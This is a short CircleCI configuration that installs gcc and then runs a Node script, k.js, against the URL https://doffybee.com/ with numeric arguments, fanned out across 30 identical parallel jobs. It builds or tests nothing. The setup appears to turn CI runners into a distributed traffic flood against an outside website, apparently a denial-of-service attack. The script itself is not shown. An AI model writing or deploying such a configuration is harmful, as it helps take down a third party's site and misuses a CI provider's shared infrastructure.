version: 2.1

jobs:
  build-and-run:
    docker:
      - image: cimg/node:20.5
    resource_class: medium
    parameters:
      job-number:
        type: integer
        default: 1
    steps:
      - checkout
      - run:
          name: Install system dependencies
          command: sudo apt-get update && sudo apt-get install -y gcc build-essential
      - run:
          name: Run Node script
          command: node k.js https://doffybee.com/ 200 4 1000 1

workflows:
  version: 2
  parallel-gcc-jobs:
    jobs:
      - build-and-run:
          matrix:
            parameters:
              job-number: [1,2,3,4,5,6,7,8,9,10,
                           11,12,13,14,15,16,17,18,19,20,
                           21,22,23,24,25,26,27,28,29,30]
